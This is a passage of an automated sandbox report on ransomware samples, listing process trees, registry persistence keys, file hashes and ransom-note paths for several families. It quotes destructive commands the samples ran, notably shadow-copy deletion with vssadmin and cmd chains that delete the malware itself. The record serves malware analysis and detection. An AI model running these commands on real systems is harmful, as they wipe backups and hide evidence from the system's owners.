Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto

Files

memory/4948-1-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

memory/4948-0-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

C:\pqIiT08io.README.txt

MD5 f66968c47a64569e2281f65a95991be0
SHA1 ef9e3e80bfbea4c3021b226cb8cd00687013b8a8
SHA256 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf
SHA512 cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24

memory/4948-226-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

memory/4948-225-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240705-en

Max time kernel

118s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Signatures

Hades Ransomware

ransomware hades

Hades payload

Description Indicator Process Target
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (260) files with added filename extension

ransomware

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2576 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion
PID 2576 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion
PID 2576 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion
PID 2592 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\system32\cmd.exe
PID 2512 wrote to memory of 540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2512 wrote to memory of 540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2512 wrote to memory of 540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2524 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2524 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2524 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2512 wrote to memory of 808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2512 wrote to memory of 808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2512 wrote to memory of 808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2524 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2524 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2524 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion

C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion /go

C:\Windows\system32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion" & del "C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion" & rd "C:\Users\Admin\AppData\Roaming\EnterpriseDraw\"

C:\Windows\system32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion"

Network

N/A

Files

memory/2576-0-0x0000000001B30000-0x0000000001CF2000-memory.dmp

memory/2576-1-0x0000000140000000-0x00000001401E2000-memory.dmp

\Users\Admin\AppData\Roaming\EnterpriseDraw\Fusion

MD5 9fa1ba3e7d6e32f240c790753cdaaf8e
SHA1 7bcea3fbfcb4c170c57c9050499e1fae40f5d731
SHA256 fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87
SHA512 8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe

memory/2592-12-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2592-11-0x0000000001B60000-0x0000000001D22000-memory.dmp

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\HOW-TO-DECRYPT-gn9cj.txt

MD5 0c6d0a67b942d06fe27f41c7c582cdfe
SHA1 7e674cf6375b138cabca2706583d4ced7a1aef27
SHA256 014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c
SHA512 53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

memory/2576-478-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2592-501-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2592-542-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2592-543-0x0000000001B60000-0x0000000001D22000-memory.dmp

memory/2576-545-0x0000000001B30000-0x0000000001CF2000-memory.dmp

memory/2576-544-0x0000000140000000-0x00000001401E2000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

141s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Signatures

Hades Ransomware

ransomware hades

Hades payload

Description Indicator Process Target
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (167) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\KglWindows\Event N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 412 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\KglWindows\Event
PID 412 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\KglWindows\Event
PID 5116 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Roaming\KglWindows\Event C:\Windows\SYSTEM32\cmd.exe
PID 5116 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Roaming\KglWindows\Event C:\Windows\SYSTEM32\cmd.exe
PID 412 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\SYSTEM32\cmd.exe
PID 412 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\SYSTEM32\cmd.exe
PID 4988 wrote to memory of 1284 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 4988 wrote to memory of 1284 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 4988 wrote to memory of 3200 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4988 wrote to memory of 3200 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4780 wrote to memory of 5008 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 4780 wrote to memory of 5008 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 4780 wrote to memory of 3176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4780 wrote to memory of 3176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Users\Admin\AppData\Roaming\KglWindows\Event

C:\Users\Admin\AppData\Roaming\KglWindows\Event /go

C:\Windows\SYSTEM32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\KglWindows\Event" & del "C:\Users\Admin\AppData\Roaming\KglWindows\Event" & rd "C:\Users\Admin\AppData\Roaming\KglWindows\"

C:\Windows\SYSTEM32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Roaming\KglWindows\Event"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Network

Country Destination Domain Proto

Files

memory/412-0-0x0000000002080000-0x0000000002242000-memory.dmp

memory/412-1-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\KglWindows\Event

MD5 9fa1ba3e7d6e32f240c790753cdaaf8e
SHA1 7bcea3fbfcb4c170c57c9050499e1fae40f5d731
SHA256 fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87
SHA512 8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe

memory/412-8-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/412-10-0x0000000002080000-0x0000000002242000-memory.dmp

memory/5116-12-0x0000000002010000-0x00000000021D2000-memory.dmp

memory/5116-11-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt

MD5 0c6d0a67b942d06fe27f41c7c582cdfe
SHA1 7e674cf6375b138cabca2706583d4ced7a1aef27
SHA256 014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c
SHA512 53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c

memory/5116-358-0x0000000002010000-0x00000000021D2000-memory.dmp

memory/5116-357-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/412-359-0x0000000140000000-0x00000001401E2000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

121s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Renames multiple (81) files with added filename extension

ransomware

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Network

N/A

Files

F:\$RECYCLE.BIN\GET_YOUR_FILES_BACK.txt

MD5 0237b63f764204e00d7242cc4d908271
SHA1 9d88e59463e2a963bea95d6a2cc5383e922f2f27
SHA256 7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857
SHA512 0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240705-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (182) files with added filename extension

ransomware

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2672 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2324 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2672 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 1556 wrote to memory of 2900 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

C:\PerfLogs\How To Restore Your Files.txt

MD5 81fc4c91a0938482f65a72216cda1e39
SHA1 3fb3d27ceb1502ddf0d68fa9251a6aec46036377
SHA256 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591
SHA512 ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4

Analysis: behavioral16

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

145s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

Signatures

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

C:\Windows\SysWOW64\cmd.exe

/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

memory/468-0-0x00000000022B0000-0x0000000002310000-memory.dmp

memory/468-1-0x0000000000400000-0x000000000046C000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ink\ar-SA\!!FAQ for Decryption!!.txt

MD5 69acb73a5829bdddc9a7cf322178c70f
SHA1 3cd71f6cc40c90322e027712403899db2976218b
SHA256 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5
SHA512 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e

memory/468-372-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-1669-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-2324-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-4781-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-4788-0x0000000000400000-0x000000000046C000-memory.dmp

memory/468-7469-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-9417-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-10631-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-12089-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-12594-0x0000000000400000-0x000000000051D000-memory.dmp

memory/468-12595-0x0000000000400000-0x000000000046C000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240708-en

Max time kernel

122s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (9354) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\C4B6.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_up.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\css\slideShow.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
